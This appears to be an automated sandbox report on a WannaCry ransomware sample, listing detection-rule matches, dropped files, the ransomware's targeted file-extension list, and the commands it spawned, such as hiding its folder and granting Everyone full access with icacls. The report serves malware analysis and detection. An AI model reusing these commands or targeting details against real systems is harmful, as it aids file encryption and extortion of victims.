Source: Joe Sandbox View	Dropped File: C:\@WanaDecryptor@.exe B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\@WanaDecryptor@.exe B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25

Source: LisectAVT_2403002A_126.EXE.exe	Static PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: taskdl.exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1332855923.00000000024A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs LisectAVT_2403002A_126.EXE.exe
Source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1788283067.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs LisectAVT_2403002A_126.EXE.exe
Source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1333158366.0000000002493000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs LisectAVT_2403002A_126.EXE.exe
Source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1364421681.0000000000AAF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs LisectAVT_2403002A_126.EXE.exe
Source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1374099272.0000000000ABF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs LisectAVT_2403002A_126.EXE.exe
Source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1355372100.0000000000AAD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs LisectAVT_2403002A_126.EXE.exe
Source: LisectAVT_2403002A_126.EXE.exe	Binary or memory string: OriginalFilenamediskpart.exej% vs LisectAVT_2403002A_126.EXE.exe

Source: LisectAVT_2403002A_126.EXE.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: LisectAVT_2403002A_126.EXE.exe, type: SAMPLE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: LisectAVT_2403002A_126.EXE.exe, type: SAMPLE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: LisectAVT_2403002A_126.EXE.exe, type: SAMPLE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.0.LisectAVT_2403002A_126.EXE.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 0.0.LisectAVT_2403002A_126.EXE.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 0.0.LisectAVT_2403002A_126.EXE.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000000.00000000.1324912594.000000000040E000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@WanaDecryptor@.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\@WanaDecryptor@.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: f.wnry.0.dr

Binary string: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.WNCRY

Source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1788283067.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1364421681.0000000000AAF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1374099272.0000000000ABF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.1355372100.0000000000AAD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: A.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docConnecting to server...s.wnry%08X.eky%08X.res00000000.resrb%08X.dky%08X.pkyConnectedSent requestSucceedReceived responseCongratulations! Your payment has been checked!
Source: iconcache_256.db.WNCRYT.0.dr	Binary or memory string: .SlnY
Source: LisectAVT_2403002A_126.EXE.exe	Binary or memory string: @.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll

Source: classification engine

Classification label: mal100.rans.evad.winEXE@790/973@0/0

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe

File created: C:\Users\user\Desktop\b.wnry

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Mutant created: \Sessions\1\BaseNamedObjects\MsWinZonesCacheCounterMutexA
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\MsWinZonesCacheCounterMutexA0

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe

File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Diagnosis\Temp\~SD48A5.tmp

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 70341721944935.bat

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs

Source: LisectAVT_2403002A_126.EXE.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\cscript.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\taskdl.exe

Evasive API call chain: __getmainargs,DecisionNodes,exit

graph_6-217

Source: unknown	Process created: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe "C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe"
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Windows\SysWOW64\attrib.exe attrib +h .
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /Q
Source: C:\Windows\SysWOW64\attrib.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 70341721944935.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Windows\SysWOW64\attrib.exe attrib +h .	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /Q	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 70341721944935.bat	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
